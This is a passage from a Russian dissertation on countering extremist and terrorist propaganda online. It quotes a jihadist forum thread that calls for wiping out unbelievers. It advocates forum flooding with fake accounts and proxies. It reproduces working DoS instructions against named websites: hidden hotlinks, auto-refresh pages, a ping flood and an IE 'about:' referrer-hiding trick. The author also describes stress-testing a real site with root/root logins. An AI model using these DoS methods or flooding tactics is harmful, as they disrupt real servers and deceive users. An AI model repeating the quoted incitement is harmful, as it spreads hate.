Функционально возможные инструментальные средства противодействия распространению идей экстремизма и терроризма в сети Интернет на территории РФ

Исследование глобальной сети Интернет как информационной платформы продвижения идеологии экстремизма и терроризма. Характеристика функциональной действенности существующих правовых актов в РФ, регламентирующих использование информационных ресурсов сети.

Рубрика Безопасность жизнедеятельности и охрана труда
Вид диссертация
Язык русский
Дата добавления 10.11.2011
Размер файла 3,4 M

Отправить свою хорошую работу в базу знаний просто. Используйте форму, расположенную ниже

Студенты, аспиранты, молодые ученые, использующие базу знаний в своей учебе и работе, будут вам очень благодарны.

Важной составляющей данного проекта является Саляф Форум http://salaf-forum.ru/

Рассмотрим тред данного форума под названием «На Кавказе Джихад???» http://salaf-forum.ru/viewtopic.php?f=8&t=2498&hilit=%D0%B4%D0%B6%D0%B8%D1%85%D0%B0%D0%B4 (таблица 10). Весь тред представлен в Приложении 3.

Таблица 10. Фрагмент треда «На Кавказе Джихад???»

"На Кавказе Джихад???"

guraba_x » Вт 10 ноя 2009, 11:22 Ассаламу Алекум!

Вот уже прошёл почти год без нескольких дней, как все пользователи форума дружно составили письмо с вопросами к ученным о положении Кавказа. Эта тема продолжение ныне закрытой "Где сейчас джихад?". в которой админ отвечая на очередной вопрос "Есть продвижения по письму?" оставляет нам надежду говоря: "Не знаю точно, но слышал от братьев, что Саудовские студенты пытаются через шейхов вопрос к Ляджне занести на серьезном уровне, в котором все будет подробно расписано и с требованием доводов и как поступать по данному вопросу."

О Аллах, наставь всех мусульман на истинный путь и освободи от униженийи! Даруй нам через справедливых, богобоязненных, любящих ради Аллаха умму Посланника(с.а.с.) фетву от ученных! О Аллах, я приношу публичное покаяние Тебе, если я в чем то ошибся и принёс личную обиду кому либо. Ассаламу Алейкум! Админ, ради Аллаха я прошу тебя не удалять эту тему!!!

Джалиль Абу Рамазан » Вт 10 ноя 2009, 14:02

уа алейкум салам брат!( Пусть Аллах воздаст тебе благом за твое напоминание. И пусть более шайтан не заставит нас забыть о наших братьях НИКОГДА!

Я сделаю все возможное от себя, чтобы по этому вопросу были хоть какие-то продвижения! О Аллах унизь неверных посягнувших на кровь, честь и земли мусульман! О Аллах не оставь на земле ни одного кафира, ибо если Ты оставишь их, то они введут в заблуждение Твоих рабов и не породят никого кроме таких же неверных и распутников!

О Аллах даруй верное руководство, победу и безопасность нашим братьям с Кавказа и всем мусульманам! Амин!

***

Ruslan Abu Ibrahim » Вт 17 ноя 2009, 08:17 Ас-саляму алейкум уа рахматуллах. Хотел бы привести здесь фатуа шейха Абдуррахмана аль-Баррака, по поводу недозволенности делать дуа о погибели всех невреных вместе без исключения.

Поэтому необходимо разделять между понятием общего уничтожения неверных и между проклятием на них. Просим Аллаха, чтобы Он по милости Своей открыл нам врата узаконенного сражения с неверующими, и чтобы Он не лишал нас возможности получить награду за это великое поклонение. И чтобы наставил правителей мусульман на всякое добро, исправив их дела и дела тех, над кем они правят.

Джалиль Абу Рамазан » Вт 17 ноя 2009, 21:25

ДжазакаЛлаху хайран ахи за исправление!

Джалиль Абу Рамазан

DAUD AL-HANBALI » Чт 19 ноя 2009, 17:45

A ESLI UCHENNIE SKAJUT CHTO TAM JIHAD,VI BUDETE DELAT TAM JIHAD? ILI POMOGAT CHEM SMOJETE? DAUD AL-HANBALI

samir05 » Вс 24 янв 2010, 13:25

Салам алейкум. Я не понимаю братьев которые ждут ответа на письмо думая что если ответ будет отрицательным, то есть "джихада нет" то те братья что в лесу сложат оружие и оставят это дело. Уверен что если вся ляджна приедет в Дагестан и в громкоговорители начнет кричать что тут нет джихада то это никоим образом не повлияет на обстановку.

И мне очень обидно за наших братьев Рината, Абу яхью, Салима абу Умара, Наиля которые призывает к единобожию, потому что понимают что именно это сейчас нужно на постсоветском пространстве уж тем более в моем Дагестане а их тут втоптали в гряз высмеяли и высмеивают , отстраняя ту маленькую часть интересующихся исламом братьев тут от них. И заменив их неучами , выскочками которые хотят знаменитости, или проповедниками которых страсти съели.

Mugahid » Ср 10 фев 2010, 13:12 ЗбУбЗг ЪбнЯг Мы спросили шейха Ясира Бурхами (кто не знает, это Египетский ученый, близкий друг и ученик Усеймина и др. ученых), о положении Кавказа и джихада на нем. Рассказав все положение, о тех преступлениях правохоронительных органов, как русских так и местных. Вот его ответ: "О Аллах! Даруй победу мусульманам Кавказа! Непременно на Кавказе джихад оборонительный, и обязателен для каждого"! И хвала Аллаху, делает дуа на проповедях.С дозволения Аллаха, мы собираемся обратиться с подобными вопросами и к остальным ученым Египта, таким как Исмаид Мукъаддам, Абу Исхакъ Аль-Хууайни и др.

Mugahid

Hamza » Ср 10 фев 2010, 17:25

Уа ассалям алейкум.

Mugahid писал(а):

Мы спросили шейха Ясира Бурхами

Рассказав все положение, о тех преступлениях правохоронительных органовКаких преступлениях? Что менты заходят в дома и убивают мусульман и насилуют их женщин?!А как вы спросили, где можно прочитать ваш вопрос и как он был задан брат? Просто я не раз слышал как заинтересованные братья ситуацию преподносят по своему, и самое главное что ситуация на Кавказе не везде одинаковая.

….abu zeinab » Ср 10 фев 2010, 18:32

Ас-саляму'алейкум уа рахматуЛлахи уа баракатуху.

Я поддержу брата Хамзу ! Такое заявление делать без ссылок и фатва уляма нельзя !!!!!

А кто сказал, что Ясир Бурхами, Мукаддам, абу Исхак уляма ???????

Если есть такие слова учёных ахли-Сунна, то давай брат ссылки !

Mugahid » Ср 10 фев 2010, 20:55

Хорошо, то что вы не за джихад, не только на Кавказе, но и вообще, это понятно! Ваши проблемы! …ruslan67 » Пн 09 авг 2010, 17:10

Ассаламу алейкум

вот братья сделали с этими словами видео ролик. Просим Аллаха чтобы наши усердия приносили только пользу Исламу и мусульманам.

Вопрос шейху Ибн Джибрину насчет джихада:

http://www.youtube.com/watch?v=OE7haetUqvo ruslan67

Сообщений: 12

Зарегистрирован: Пн 04 янв 2010, 12:48

Вернуться наверх

Re: "На Кавказе Джихад???"

***

» Пн 09 авг 2010, 20:50

Ассаляму алейкум уа рахматуЛлахи уа баракятух!

Пусть Аллах воздаст благом в обоих мирах всем за эту фатву!

На наш взгляд, это настолько уникальный и важный тред, что пройти мимо него нельзя.

Начнем с того, что задать данный вопрос мог лишь человек, который сомневается. В зависимости от того, чья позиция победит, зависит, примкнет он к исламистам или нет. Практически сразу на его вопрос откликаются: «О Аллах не оставь на земле ни одного кафира…». Словам этого человека мотивированно оппонируют и он приносит извинения. Не остается вопрос и без внимания иностранной стороны: «A ESLI UCHENNIE SKAJUT CHTO TAM JIHAD, VI BUDETE DELAT TAM JIHAD? ILI POMOGAT CHEM SMOJETE?». Поскольку латиницей русские слова обычно пишут с компьютеров, не имеющих русскую раскладку. Следовательно, форум отслеживается не только на территории СНГ.

Хочется отметить одно из высказываний: «Я не понимаю братьев которые ждут ответа на письмо думая что если ответ будет отрицательным, то есть "джихада нет" то те братья что в лесу сложат оружие и оставят это дело. Уверен что если вся ляджна приедет в Дагестан и в громкоговорители начнет кричать что тут нет джихада то это никоим образом не повлияет на обстановку…» Поскольку является действительно распространенным мнением, имеющим под собой основание. Далее же приведенный ответ шейха Ясира Бурхами, не чем не подтвержденный вызывает негодование со стороны участников диспута. После же ответа шейха Ибн Джибрина, с записью его голоса следует всего один пост: «Пусть Аллах воздаст благом в обоих мирах всем за эту фатву!». А далее, абсолютно грамотное решение со стороны администратора сайта о закрытии треда, то есть никто больше не может оставить свое сообщение. Но весь тред доступен для чтения в любое время. Этот пример треда должен стать классическим примером для любого администратора подобных форумов.

Но создание и управление подобными тредами возможно лишь на подконтрольных сайтах. На форумах же, где администраторами являются представители исламистов подобные информационные победы практически не возможны. Не нужные, грамотные посты, как правило, удаляются а их авторы блокируются. В данной ситуации становится довольно целесообразным применение такого метода как Флуд Флуд (от неверно произносимого англ. flood -- наводнение, затопление) -- размещение однотипной информации на нескольких ветках форума или разных форумах, одной повторяющейся фразы, символов, букв, слов, одинаковых графических файлов или просто повторяющихся коротких сообщений не несущих смысловой нагрузки на веб-форумах, в чатах и блогах. Лицо, которое распространяет флуд, на интернет-сленге -- флумдер. http://ru.wikipedia.org/wiki/Флуд. Четкого определения данного термина нет. Приведенное в ссылке определение, на наш взгляд, не является полным, и требует добавления к нему не только однотипно информации, но и информации, не относящейся к теме и по возможности довольно объемной. Информационный мусор позволит увести посетителей данного треда в сторону или сделать изучение треда или участие в нем мало интересным. Но лицо занимающееся флудом должно быть готово, что в конце концов оно будет «забанено», поэтому стоит запостись несколькими никами, да и не помешает пользоваться анонимными прокси серверами. Как один из лучших вариантов - это устроить перепалку, не относящуюся к теме между двумя несуществующими людьми.

2.2 Технические средства противодействия распространению идей экстремизма и терроризма в русскоязычном сегменте сети Интернет

Структура технических средств, которые государство может применить в вопросе противодействия распространению идей экстремизма и терроризма, напрямую зависит от законодательства страны.

Основным ограничителем в сети Интернет для конкретного пользователя является Прокси-сервер Прокси-сервер - специальный Интернет-сервер, управляющий входящим и исходящим трафиком интернета в локальной сети. Прокси-сервер определяет безопасность передачи сообщений или файлов в сеть организации; управляет доступом к сети; фильтрует и отклоняет запросы согласно заданным параметрам.

http://slovari.yandex.ru/ провайдера.

На сегодняшний момент основанием для введения ограничений или прекращению доступа к тому или иному Интернет-ресурсу является внесение данного ресурса в «Федеральный список экстремистских материалов» http://www.minjust.ru/ru/activity/nko/fedspisok/ (список с последними обновлениями представлен на официальном сайте Министерства Юстиции РФ), либо если ресурс является официальным сайтом организации, в отношении которых судом принято вступившее в законную силу решение о ликвидации или запрете деятельности по основаниям, предусмотренным Федеральным законом "О противодействии экстремистской деятельности". В этом случае Министерством юстиции всем интернет-провайдерам рассылаются соответствующие информационные письма, а так же организации предоставляющей Интернет-хостинг Услуга по предоставлению аппаратного и программного обеспечения для функционирования сайта в Интернете. Иногда под хостингом понимают услугу расположения и подключения к Интернету оборудовав клиента на стороне хостера. http://slovari.yandex.ru/ . Таким образом, если сервер, на котором находится ресурс, размещен на территории РФ, то сайт удаляется физически, либо в большинстве случаев провайдеры блокируют запросы к данному ресурсу.

На сегодняшний момент в федеральном списке находятся более 130 материалов и интернет-ресурсов, в отношении которых вынесен запрет, что практически составляет 15% от общего количества материалов признанных экстремистскими, причем в период с января по август 2011 года было внесено 27 материалов распространенных в сети Интернет. 16 из 27 были внесены Советским районным судом г. Махачкала в отношении материалов, размещенных на сайте Sadililahi.com. Нет ни одного решения, где бы фигурировал, например, youtube.com, да и нет других популярных сервисов, на которых присутствуют экстремистские материалы.

Итак, в настоящее время в случае признания материалов или сайтов экстремистскими, к ним ограничивается или закрывается доступ.

Однако процедура принятия решения о признании материалов или сайтов экстремистскими через суды не способствует оперативности в принятии решения, а, следовательно, не является эффективной мерой. До момента принятия решения данные материалы могут быть растиражированы на десятки и сотни сайтов.

Ключевой проблемой идентификации интернет-ресурсов экстремистской и террористической направленности является определение способов выявления сайтов с противоправным контентом. На наш взгляд, должны быть созданы автоматизированные системы выявления Интернет ресурсов с противоправным контентом. Эти системы должны проверять Интернет-ресурсы на наличие экстремистских материалов, лозунгов. Технически это реализуемо, технология аналогична алгоритмам идентификации оригинальности контрольных, дипломных, диссертационных работ с помощью использования информационных систем.

Но, что бы такая система начала эффективно функционировать, она должна содержать огромную базу материалов, лозунгов, высказывание, которые являются экстремистскими.

По словам заместителя министра связи и массовых коммуникаций России О.Духовницкого, специалисты Роскомнадзора уже приступили к разработке автоматизированной системы поиска в Интернете материалов экстремистского характера Московский Комсомолец № 25715 от 10 августа 2011 г, которые публикуют СМИ.

Очень важным аспектом в регулирования сети Интернет является поисковые системы Rambler, Yandex, Google и другие, поскольку именно от функциональности и эффективности данных ресурсов зависит успешность посещения глобальной сети конечными пользователями.

Для тех пользователей, которые работают в Интернет уже не один год заметно, что в последние годы все поисковые системы довольно значительно изменили свой алгоритм вывода информации на запрос. При этом можно утверждать, что определенные действия в вопросе регулирования работы поисковых систем в русскоязычном сегменте ведутся. На каком уровне происходит данное регулирование, для нас неизвестно.

Приведем результаты эксперимента, проведенного автором исследования в апреле и августе 2011 года (таблица 11).

Таблица 11. Результаты запроса «бомба» к русскоязычной поисковой системе Google и запроса «bomb» к англоязычной поисковой системе Google

Количество результатов запроса Апрель 2011

Количество результатов запроса Август 2011

Русскоязычный сервер Google www.google.u

131 000 000

17 900 000

Англоязычный сервер Google www.google.com/en

56 000 000

322 000 000

Таким образом, из результатов эксперимента видно, что в августе 2011 года русскоязычная поисковая система выдала результатов в 7 раз меньше чем апреле 2011 года, англоязычная система, напротив, в августе выдала результатов почти в 6 раз больше чем в апреле. Этот эксперимент, конечно ничтожно мал, чтобы делать какие-то глобальные выводы. Однако то, что алгоритмы поисковых систем преобразуются, становится очевидным.

Ключевым направлением в формировании комплекса мероприятий противодействия распространению идей экстремизма и терроризма являются технологии, связанные с дестабилизацией работы Интернет-ресурсов. Термины «хакер», «хакерская атака» являются довольно распространенными, они ассоциируются с незаконным проникновением на сервера и с похищением информации или денежных средств со счетов. Однако эти термины характеризуют явление в целом, а не конкретные его проявления.

В контексте достижения цели данного исследования интерес представляет исследование особенностей DoS-атак DoS-атака -- атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых легитимные (правомерные) пользователи системы не могут получить доступ к предоставляемым системой ресурсам (серверам), либо этот доступ затруднён. Отказ «вражеской» системы может быть как самоцелью (напр., сделать недоступным популярный сайт), так и одним из шагов к овладению системой (если во внештатной ситуации ПО выдаёт какую-либо критическую информацию -- напр., версию, часть программного кода и т. д.). Если атака выполняется одновременно с большого числа компьютеров, говорят о DDoS-атаке. http://ru.wikipedia.org/wiki/DoS-атака и DDoS-атак.

Все Интернет-ресурсы функционируют на серверах, подключенных к сети Интернет. Каждый из таких серверов имеет свой предел надежности, который зависит от многих факторов, таких как: технические характеристики сервера, операционная система, используемая на сервере, антивирусное обеспечение, наличие программ защиты от DoS-атак, пропускная способность канала и многие другие.

Что касается технических характеристик, то это объем оперативной памяти, производительность процессора (процессоров).

Важным фактором является операционная система (Uniх, Linux, FreeBSD, Windows и т.д.), в зависимости от специфики которой выбираются и методы атак.

Отсутствие антивирусного обеспечения, использование слабого ПО, отсутствие обновлений, все это так же способствует успеху атаки.

Слабая пропускная способность канала, при большом количестве обращении к серверу сделает работу с сервером практически невозможной.

Очень показательным в этом плане является сайт «Сообщество по борьбе с экстремистскими сайтами» http://www.kouzdra.ru/anticenter.org/ataka.htm (http://anticenter.org - домен выставлен на продажу в июле 2011). Инструкция, выставленная на данном сайте, представлена в таблице 12.

Таблица 12. Инструкция, представленная на сайте «Сообщество по борьбе с экстремистскими сайтами»

Как уничтожить сайты экстремистов, не имея специального оборудования для атак

Многие жители различных стран мира устали от лжи и дезинформации, которая распространяется так называемыми "СМИ" несуществующей республики "Ичкерия". Теперь помешать нормальной работе этих "СМИ" и даже вывести их из строя может каждый. Ниже приведены всевозможные варианты для атак на экстремистские сайты. Если у Вас есть свои идеи по этому поводу, пишите по почте, мы их обязательно опубликуем.

В данный период времени весьма актуально направить нижеуказанные коды против сайта http://chechenpress.org или shamilonline.org т.к. сайт "Кавказ-Центр" с помощью данных кодов атаковать сложно.

Способ №1

Многие хотят поучаствовать в акции, но не имеют своих веб-ресурсов. Вы можете внести свой посильный вклад очень простым способом. Сделайте сами и друзьям расскажите.

Открываете любой текстовый редактор, вставляете в него следующий код:

<img src=http://www.chechenpress.org/baners/l_ban.gif style=display:none>

сохраняете его на диске как blank.html

Идете в свойства браузера (сервис>свойства) и ставите этот файл в качестве стартовой страницы:

file:///С:/blank.html

Теперь при каждом нажатии на кнопку "домой" вы будете дергать вражеский сервер.

Представьте, сколько раз за день вы открываете браузер или жмете эту кнопку если 10 тысяч человек проделают это на своих компьютерах, то сервер будет иметь сотни тысяч пустых запросов ежедневно. Отсечь такую атаку невозможно.

Самые отчаянные могут поставить такой код:

<script>

function go(){location.href="blank.html";}

</script>

<body onload=go()>

<img src=http://www.chechenpress.org/baners/l_ban.gif style=display:none>

Один компьютер за минуту сгенерит сотни запросов.

Совет взят с форума "p4p"

Способ №2

Копируем отсюда в блокнот следущий текст:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<meta http-equiv="Refresh" content="1">

<meta http-equiv="Cache-Control" content="no-cache, must-revalidate">

<meta http-equiv="pragma" content="no-cache">

<html>

<frameset rows="1">

<frame src="http://www.chechenpress.org/baners/l_ban.gif" hight="10%" frameborder="1"> </frameset>

</html>

Сохраняем его на диске под любым именем, например, kavkaz.txt, затем в проводнике переименовываем в kavkaz.html и открываем <meta http-equiv="Refresh" content="1"> - Refresh обязывает браузер обновлять содержимое через content="1" секунд (в данном случае через 1 сек). <meta http-equiv="Cache-Control" content="no-cache, must-revalidate"> - говорит браузеру, чтобы содержимое считывалось, а не вытаскивалось из кеша.

Такой скрипт дает возможность, не прикладывая никаких усилий, создавать искуственную нагрузку на сайт экстремистов, в данном случае, на "Чеченпресс".

Способ №3

Для Windows 2000/XP кнопка Пуск -> Программы -> Командная строка. В черном окне вбить команду:

ping chechenpress.org -t -l 5000

Нажать Enter и сбросить окно вниз. Трафик сайт получит. Если вы платите за трафик, то и вы тоже.

Правда, в некоторых случаях подобная атака блокируется еще на уровне провайдера, но не всегда.

Способ №4 (если у Вас есть свой сайт)

Объясним смысл хотлинка и способ его проведения через протокол about: Хотлинк - это загрузка како-го либо файла с сервера жертвы на атакующем сервере

Для чего нужен хотлинк?

Для того, что бы создать нагрузку либо на канал атакуемого сервера либо на сам сервер.

Есть 2 способа хотлинка:

a) Можно разместить на своих сайтах код, загружающий какую-то увесистую картинку с сайта жертвы:

<img src=http://site.com/image.gif>.

Что бы не показывать эту картинку вашим серферам, проставим размеры в 1 пиксель:

<img src=http://site.com/image.gif width=1 height=1>

Для солидности, можем запретить показ картинки на вашей странице с помощью стилей:

<img src=http://site.com/image.gif width=1 height=1 style=display:none>

При таком подходе каждый срефер, зашедший на ваш сайт, загрузит картинку с атакуемого сервера, но не увидит ее.

Что имеем? Имеем загрузку канала атакуемого сервера. Траффик стоит денег, соответсвенно у жертвы растут счета за хостинг. Если у жертвы канал не толстый, то при большом количестве запросов произойдет пробка и к серверу пробиться станет сложно.

Но это не наш метод. Переходим к способу "б"

б) Запрашивать нужно не картинки а "тяжелые" скрипты. Скрипты, требующие обращения к базам данных или больших вычислительных мощностей. Обычно на сайтах типа КЦ скрипты не оптимизированны под большие нагрузки. Большое количество запросов к таким скриптам загрузит процессор атакуемого сревера, забьет логами жесткий диск и т.д. В результате сервер просто умрет, хотя канал до сервера будет загружен не очень сильно.

Пример:

<img src=http://site.com/script.php width=1 height=1 style=display:none>

В таком варианте атакуемый сервер получает запрос на выполнение срипта и выполняет его, но так, как запрашиваем мы через тег <img src>, а возвращаемый результат не является картинкой, то на нашем сайте будет показана иконка "битой картинки". Загнав эту иконку в 1х1 пиксель и прикрыв стилями (style=display:none) мы избавим наших серферов от просмотра "битой" графики. Они просто ничего не заметят.

Для увеличения нагрузки на сервер можно хотлинковать сразу 5-10-20... скриптов.

Просто увеличиваем количество "картинок":

<img src=http://site.com/script1.php width=1 height=1 style=display:none>

<img src=http://site.com/script2.php width=1 height=1 style=display:none>

<img src=http://site.com/script3.php width=1 height=1 style=display:none>

Лучше всего ставить эти код вниз своих страниц, что бы серферу не пришлось ждать загрузки вашей информации. Он сперва получит то, за чем пришел и попутно дернет жертву.

Подход всем хорош, за исключением того, что эти запросы могут быть обращены против атакующего. При получении запроса к картинке или скрипту, сервер может проверить поле HTTP_REFERRER и если в этом указано, что запрос пришел с атакующего сайта, средиректить его обратно, на какой-либо из ваших собственных скриптов. В итоге вы будете грузить сами себя.

Что бы этого не произошло мы несколько усложним конструкцию. В IE имеется протокол "about:". Пример - ваша стартовая страница about:blank. В версиях IE до XPSP2 и некоторых патчей для SP1 работает следущая фича: При добавлении любого символа после двоеточия в about:, этот символ выводится на странице.

например about:1 - выведет на странице единицу.

about:<script>alert()</script> - выведет в теле страницы код скрипта и исполнит его.

about:<img src=http://site.com/image.gif> - выведет на странице картинку.

about:<img src=http://site.com/script1.php width=1 height=1 style=display:none>

- дернет скрипт на чужом сервере, создав нагрузку.

Самое главное: поле HTTP_REFERRER при этом останется пустым, т.к. выполняется это всё на локальной машине. Соответсвенно вернуть вам ответку атакуемый не сможет. Он будет видеть запросы, но источник атаки он не обнаружит. И так доводим код до ума и вызываем протокол about: в ифрейме. <iframe src="about:<img src=http://www.chechenpress.org/baners/l_ban.gif>" width=0 height=0>.

Продублировав такой код 10 раз и изменив имена вызываемых скриптов вы заставите каждого посетителя вашего сайта 10 раз дернуть вражеский сервер. Хотлинковать лучше всего тяжелые скрипты, например топики на форумах, поисковые запросы, или картинки.

http://www.chechenpress.org/baners/l_ban.gif

kavkazchat.com Просто скопируйте URL топиков в буфер обмена и замените нужные фрагменты кода. P.S. Этот протокол пропатчен M$ примерно год назад. Эти конструкции будут работать процентах на 40-50 машин, на тех, где не стоит SP2.

Остальные, пропатченные пользователи просто ничего не заметят.

Существуют в Инете и более свежие предложения.

Кроме того, существуют специальные программы, которые могут сильно усложнить работу сайта.

Если попытаться искать в поисковых системах программы для хакерских атак, то это может потребовать довольно больших временных затрат, однако без проблем можно найти десятки программ для стресс-тестирования сайтов. Именно эти программы и являются одним из основных инструментов в DoS-атаке.

Примером такой программы может служить программа «Webserver stress tool». На рисунках 10-13приведены три скриншота данной программы.

Рисунок 10. Скриншот программы «Webserver stress tool», выполнено 8% запросов

Рисунок 11. Скриншот программы «Webserver stress tool», выполнено 19% запросов

Рисунок 12. Скриншот отчета о работе «Webserver stress tool» на 19% выполнение программы прервано

Рисунок 13. Скриншот отчета о работе «Webserver stress tool». На 19% выполнение программы прервано

В проведенном в диссертационном исследовании эксперименте по использованию программы «Webserver stress tool» были следующие этапы:

1. Скачивание из сети Интернет дистрибутива программы (срок бесплатного действия 20 дней, стоимость 190$).

2. Инсталляция программы на компьютер.

3. Настройка для тестирования сайта:

- выбор сайта для тестирования (UmmaNews.com);

- определение количества виртуальных пользователей, которые будут «заходить» на сайт (10 виртуальных пользователей);

- выбор сетевых операций (действий);

4. запуск теста;

5. остановка выполнения теста, просмотр результатов.

В данном случае тест осуществлялся в течение 6 минут, скорость соединения с сайтом была в среднем 250 kbit/s, было использовано около 8 Mb бесполезного для сайта трафика. Десять виртуальных пользователей около 500 раз попытались войти на сервер под логином root, с паролем root.

То есть, происходило снижение на сайт около полутора Mb трафика каждую минуту, при этом загружая сервер различными запросами.

Не для кого не секрет, что в ряде стран уже официально существуют так называемые киберподразделения. 2 июня 2011 года в интернет-издании «Guardian» была опубликована статья «British intelligence used cupcake recipes to ruin al-Qaida website» http://www.guardian.co.uk/uk/2011/jun/02/british-intelligence-ruins-al-qaida-website . В этой статье рассказывалось о том, что офицеры Британской разведывательной службы смогли успешно саботировать работу англоязычного интернет-журнала Аль-Кайды. Им удалось изменить содержимое PDF-файла, который содержал один из номеров журнала. В частности инструкция по созданию бомбы была заменена на рецепт выпечки. Примечательно, что США отказалось участвовать в акции, однако прокомментировало в лице генерала А.Кейтс (Keith Alexander), который является командующим киберподразделения США, как полностью легитимную акцию.

Таким образом, можно констатировать, что кибер-атаки (хакерские атаки) стали практически узаконенным инструментом в руках спецслужб многих стран.

Однако, в вопросе противодействия экстремизму и терроризму, может появиться другая проблема, связанная с нехваткой нужной информации, отсутствием у людей доступа к сети Интернет в том или ином регионе или стране. Так, например, получить достоверную информацию о ситуации в Афганистане, оказавшемся под властью талибов и превратившимся в международный террористический центр, невозможно.

В данном случае особый интерес представляют публикации в Lenta.ru (Интернет издание Rambler Media Group), «Демократия в тени» http://www.lenta.ru/articles/2011/06/14/intheshadows/ и «США создадут "теневой" интернет в помощь иностранным диссидентам» http://lenta.ru/news/2011/06/13/shadow/ . Первоисточником для этих статей послужила статья в интернет издании Нью-Йорк Таймс (The New York Times) - «U.S. Underwrites Internet Detour Around Censors» http://www.nytimes.com/2011/06/12/world/12internet.htm?_r=2&scp=2&sq=shadow%20internet&st=cse . В данной статье рассматриваются два основных варианта:

- Создание в данных регионах независимой сотовой связи, которую не смогли бы отключить;

- создание мобильного устройства, которое можно будет переправить через границу какого-либо государства и быстро настроить там беспроводную связь, способную, в частности, обеспечить попадание во всемирную Сеть.

Принцип действия представлен на рисунке 14.

Рисунок 14. Схема создания «теневого» Интернет

Основной смысл указанной на рисунке 14 схемы в том, что в обычной ситуации большинство пользователей работают через телефонные линии или ВОЛС местных провайдеров, а в случае блокирования доступа они могут воспользоваться беспроводным вариантом, имеющим независимые точки подключения к сети Интернет.

Еще раз подчеркнем, что на сегодняшний момент это не является актуальным для ситуации в нашей стране, однако изучить данный вопрос необходимо, как с точки зрения распространения данной технологии, так возможно и сточки зрения препятствия этому явлению.

Тем более, хорошо известно, что массовые акции протеста в подавляющем большинстве проходят в мегаполисах или больших городах, то есть данные «теневые» сети не обязательно распространять на весь регион.

Тем более что создание подобных точек подключения к сети Интернет, минуя официальных провайдеров вполне возможно. На территории страны действуют такие крупные иностранные компании спутниковой связи, как Иридиум (в составе орбитальной группировки 66 спутников, 100% покрытие земного шара), INMARSAT (Инмарсат) (11 спутников в орбитальной группировке). Продается оборудование для двухсторонней спутниковой связи. А создание открытой WI-FI в городской черте вообще не является проблемой.

Именно по принципу использования двухстороннего спутникового интернета функционируют многие подпольные Интернет-кафе в Китае.

Единственной проблемой в распространении данного явления является большая стоимость оборудования (от 2500$) и высокая стоимость трафика, отсутствие безлимитных тарифов.

Государство обладает довольно большим арсеналом средств, которые можно использовать в вопросах противодействия распространению идей экстремизма и терроризма в сети Интернет. Причем, простое закрытие доступа к сайту с определенным контентом не всегда является эффективным способом. Лишь системное использование различных методов может дать положительный результат.

3. НАПРАВЛЕНИЯ СОВЕРШЕНСТВОВАНИЯ ПРАВОВОГО РЕГУЛИРОВАНИЯ ДОСТУПА К СЕТИ ИНТЕРНЕТ НА ТЕРРИТОРИИ РФ

3.1 Обзор существующего законодательства, регулирующего режим пользования информационными ресурсами в сети Интернет

Вопрос о правовом статусе Интернет один из наиболее обсуждаемых вопросов. Существуют, абсолютно диаметральные мнения:

- Интернет - это саморегулируемая система;

- Интернет - должен быть абсолютно контролируемым.

Естественно, что истина лежит между этими двумя крайностями. Одно можно сказать однозначно, отдельные составляющие системы Интернет будут подконтрольны.

Однако в течение последних десяти лет осуществляется поэтапное и постепенное вовлечение различных аспектов информационной, социальной и экономической сфер в нормативно-правовое поле отдельных стран. В основном это касается вопросов регулирования авторского права и сопровождения хозяйственно-экономических процессов.

Решение данного вопроса является приоритетным для большинства экономически развитых стран.

Так, в Евросоюзе только в 2011 году было принято несколько десятков новых правил, регламентирующих правила работы Интернет-сайтов и Интернет провайдеров. В Беларуси принят, неоднозначно оцененный в мире, Указ «О мерах по совершенствованию использования национального сегмента сети Интернет».

Регулирование деятельности в сети Интернет в России имеет фрагментарный характер - в последнее время принимаются отдельные правовые акты, направленные на сопровождение различных процессов (хозяйственных сделок, развитие электронного правительства и т.д.), однако отсутствует единое законодательство, регулирующее развитие общего информационного пространства русскоязычного сегмента сети.

Главным законом России является Конституция Российской ФедерацииСайт Конституции РФ http://www.constitution.ru/ , проанализировав статьи которой, можно определить, в каком направлении следует двигаться при определении правового статуса сети Интернет.

Так, пункт 5 13 статьи Конституции РФ фактически дает основания, по которым возможно введение ограничений, в том числе и в сети Интернет. А именно: «Запрещается создание и деятельность общественных объединений, цели или действия которых направлены на насильственное изменение основ конституционного строя и нарушение целостности Российской Федерации, подрыв безопасности государства, создание вооруженных формирований, разжигание социальной, расовой, национальной и религиозной розни».

Следующей, важной при рассмотрении данной проблемы, статьей Конституции является статья 29, пункт 5: «Гарантируется свобода массовой информации. Цензура запрещается».

По нашему мнению, пункт 5 данной статьи отчетливо показывает, что, в случае приравнивания сети Интернет к СМИ, могут возникнуть определенные сложности при разработке регулирующего законодательства.

Также, важной является статья 56, пункт 1, в котором говориться: «В условиях чрезвычайного положения для обеспечения безопасности граждан и защиты конституционного строя в соответствии с федеральным конституционным законом могут устанавливаться отдельные ограничения прав и свобод с указанием пределов и срока их действия». При определенных событиях, это может оказаться довольно важным.

Естественно, что все статьи Конституции, в том числе затрагивающие права и свободы граждан, обязательны для исполнения. Но рассмотренные выше три статьи являются отправными в исследуемом вопросе.

Приступая непосредственно к рассмотрению российского законодательства, применяемого к различным аспектам функционирования сети Интернет на территории РФ, следует отметить, что четкого и однозначного определения сети Интернет в российском нормативно-правовом поле нет.

Но, поскольку по своей природе сеть Интернет является фактически сетью передачи данных (ПД) и фактически используются телекоммуникационные сети, то особый интерес представляет закон «О связи» №126-ФЗ от 07.07.2003 г.

В статье 2 «Основные понятия» данного закона вводятся следующие понятия:

- сеть связи - технологическая система, включающая в себя средства и линии связи и предназначенная для электросвязи или почтовой связи;

- средства связи - технические и программные средства, используемые для формирования, приема, обработки, хранения, передачи, доставки сообщений электросвязи или почтовых отправлений, а также иные технические и программные средства, используемые при оказании услуг связи или обеспечении функционирования сетей связи;

- трафик - нагрузка, создаваемая потоком вызовов, сообщений и сигналов, поступающих на средства связи;

- управление сетью связи - совокупность организационно-технических мероприятий, направленных на обеспечение функционирования сети связи, в том числе регулирование трафика;

- услуга связи - деятельность по приему, обработке, хранению, передаче, доставке сообщений электросвязи или почтовых отправлений;

- электросвязь - любые излучение, передача или прием знаков, сигналов, голосовой информации, письменного текста, изображений, звуков или сообщений любого рода по радиосистеме, проводной, оптической и другим электромагнитным системам.

Фактически, данные понятия показывают, что действия данного закона распространяется и на сеть Интернет, поскольку сеть Интернет есть часть электросвязи. А именно - защита сетей связи и сооружений связи (статья 7):

1. Сети связи и сооружения связи находятся под защитой государства.

